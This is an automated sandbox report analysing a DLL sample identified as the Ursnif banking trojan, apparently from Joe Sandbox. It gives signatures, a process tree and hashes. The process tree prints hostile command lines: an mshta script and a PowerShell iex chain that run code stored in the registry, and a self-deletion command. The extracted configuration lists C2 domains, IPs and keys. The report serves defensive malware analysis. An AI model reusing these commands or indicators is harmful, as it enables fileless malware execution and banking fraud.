Windows
Analysis Report
xaj0e933Uv.dll
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 1900 cmdline: loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
- cmd.exe (PID: 1796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
- rundll32.exe (PID: 5132 cmdline: rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- control.exe (PID: 4084 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cmd.exe (PID: 5716 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- PING.EXE (PID: 3504 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
- cmd.exe (PID: 6592 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- mshta.exe (PID: 6548 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
- powershell.exe (PID: 6644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- csc.exe (PID: 6924 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 7040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- csc.exe (PID: 7144 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 6040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cleanup
{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
No Sigma rule has matched
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype |
---|---|---|---|---|---|
05/04/22-16:27:54.122082 | 2033203 | 49769 | 80 | TCP | A Network Trojan was detected |
05/04/22-16:27:53.231327 | 2033203 | 49769 | 80 | TCP | A Network Trojan was detected |
05/04/22-16:27:53.642851 | 2033203 | 49769 | 80 | TCP | A Network Trojan was detected |
05/04/22-16:27:33.120656 | 2033203 | 49760 | 80 | TCP | A Network Trojan was detected |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_03435FBB |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Code function: | 2_2_0348BAD1 | |
Source: | Code function: | 2_2_034799BC | |
Source: | Code function: | 2_2_034765C2 |
Source: | Code function: | 2_2_0347FD47 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | String found in binary or memory: | ||
Source: | Code function: | 2_2_03431CA5 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | Binary or memory string: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | Registry key value created / modified: | Jump to behavior |
Source: | Code function: | 2_2_03435FBB |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | Static PE information: |
Source: | Code function: | 2_2_03434BF1 | |
Source: | Code function: | 2_2_03431645 | |
Source: | Code function: | 2_2_0343829C | |
Source: | Code function: | 2_2_0347B238 | |
Source: | Code function: | 2_2_0348FF4D | |
Source: | Code function: | 2_2_034767CA | |
Source: | Code function: | 2_2_0348D7F1 | |
Source: | Code function: | 2_2_0348154D | |
Source: | Code function: | 2_2_03493DB0 |
Source: | Code function: | 2_2_0347F2A9 |
Source: | Code function: | 2_2_03436D0A | |
Source: | Code function: | 2_2_0343190C | |
Source: | Code function: | 2_2_03434321 | |
Source: | Code function: | 2_2_034384C1 | |
Source: | Code function: | 2_2_03485312 | |
Source: | Code function: | 2_2_03482331 | |
Source: | Code function: | 2_2_03487950 | |
Source: | Code function: | 2_2_0347710A | |
Source: | Code function: | 2_2_034861AE | |
Source: | Code function: | 2_2_0348A806 | |
Source: | Code function: | 2_2_034800DC | |
Source: | Code function: | 2_2_03480782 | |
Source: | Code function: | 2_2_0348BE80 | |
Source: | Code function: | 2_2_03486DE0 | |
Source: | Code function: | 2_2_0347C431 | |
Source: | Code function: | 2_2_034774AE | |
Source: | Code function: | 2_2_03485220 | |
Source: | Code function: | 2_2_0348EAC5 | |
Source: | Code function: | 2_2_03483829 | |
Source: | Code function: | 2_2_034710C7 | |
Source: | Code function: | 2_2_0347D77A | |
Source: | Code function: | 2_2_0347B7D5 | |
Source: | Code function: | 2_2_034736BB | |
Source: | Code function: | 2_2_034764C4 |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Code function: | 2_2_034368BD |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Code function: | 2_2_0343829B | |
Source: | Code function: | 2_2_03437EA9 | |
Source: | Code function: | 2_2_034938A9 | |
Source: | Code function: | 2_2_03493DAF | |
Source: | Code function: | 2_2_03473496 |
Source: | Static PE information: |
Source: | Code function: | 2_2_034786AD |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_0348BAD1 | |
Source: | Code function: | 2_2_034799BC | |
Source: | Code function: | 2_2_034765C2 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_0347FD47 |
Source: | Binary or memory string: | ||
Source: | Code function: | 2_2_034786AD |
Source: | Process token adjusted: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_03478FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 2_2_03433365 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 2_2_034881F1 |
Source: | Code function: | 2_2_034341FA |
Source: | Code function: | 2_2_03436D78 |
Source: | Code function: | 2_2_03433365 |
Stealing of Sensitive Information |
---|
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | 1 Input Capture | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
40% | Virustotal | Browse | ||
48% | ReversingLabs | Win32.Trojan.Zenpak | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
l-0007.l-dc-msedge.net | 13.107.43.16 | true | true | | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.189.151.28 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 620332 |
Start date and time: | 2022-05-04 16:25:58 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 32s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | xaj0e933Uv.dll |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 38 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@25/17@0/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.107.43.16
- Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6548 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
16:27:23 | API Interceptor | |
16:28:07 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.189.151.28 | Get hash | malicious | Browse | ||
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
l-0007.l-dc-msedge.net | Get hash | malicious | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-SOFTPLUSCH | Get hash | malicious | Browse |
⊘No context
⊘No context
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.8910535897909355 |
Encrypted: | false |
SSDEEP: | 192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ |
MD5: | F84F6C99316F038F964F3A6DB900038F |
SHA1: | C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1 |
SHA-256: | F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E |
SHA-512: | E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1192 |
Entropy (8bit): | 5.325275554903011 |
Encrypted: | false |
SSDEEP: | 24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5 |
MD5: | 05CF074042A017A42C1877FC5DB819AB |
SHA1: | 5AF2016605B06ECE0BFB3916A9480D6042355188 |
SHA-256: | 971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650 |
SHA-512: | 96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.9748061757983675 |
Encrypted: | false |
SSDEEP: | 24:HTe9EuZf4UzDfHUhKdNWI+ycuZhN6xakSl2PNnq9qd:6B4oGKd41ulQa3cq9K |
MD5: | B25228E0D789A80CC458BDEDCA074352 |
SHA1: | D02F77745E89EDE624F705B49991653478861CDE |
SHA-256: | AB6DDC0161E42079AAE33ED2D5CCF08861E963F50203059A1B641D41CA9E5951 |
SHA-512: | 471FF8CBFD71FE1088146FB506BCDC2120CB1515298F68644F898D49205EEA7F198A97AECC990E6438216F0798B785D2B31CBC597AA2180802AA0B0A53491E62 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.9834931582727697 |
Encrypted: | false |
SSDEEP: | 24:H5e9EuZfO5XDfH+hKdNWI+ycuZhN9akS7PNnq9qd:wBO5z0Kd41ul9a3xq9K |
MD5: | 3216E688A820A84F56F4B051422672D5 |
SHA1: | 66A45E83433BA569C1539A55EE95B8715BF3CDB9 |
SHA-256: | E6B505EA1803ACB819A72DA55DA55A8A45047CB9F64D02682F7B0FB190372B29 |
SHA-512: | 2598C34B7B84CA677422F49B86FD1D96672987E4D9CA6B4DA2392E336B0B458B914C635D059A3F0CA302B14CC1BDD06ADF374EA095B9051011B42558CAC37297 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1141398576088117 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7Ynqq7PN5Dlq5J:+RI+ycuZhN9akS7PNnqX |
MD5: | 476755BF56A208B33F9C4651A06EE5A5 |
SHA1: | 828C47F319540793ABFD06234431820E5594A420 |
SHA-256: | EB5CB6796AF4525D3264AC6A5E123A6D682A1C8431FAFC244EAD44DA8046F91C |
SHA-512: | 4B7FA176700A57354909997E6F70515F57BB61EBADE429B16262BA5BA8C90755F068EB6AF13954BB3FD39911D27DFAAC6C94A10B90F20CAFA1DE647D84F69C42 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
MD5: | 80545CB568082AB66554E902D9291782 |
SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
Malicious: | false |
Preview: |
